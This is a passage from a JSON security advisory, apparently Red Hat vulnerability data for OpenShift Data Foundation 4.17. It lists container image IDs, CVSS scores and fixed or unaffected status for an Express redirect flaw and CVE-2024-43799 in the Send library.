"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
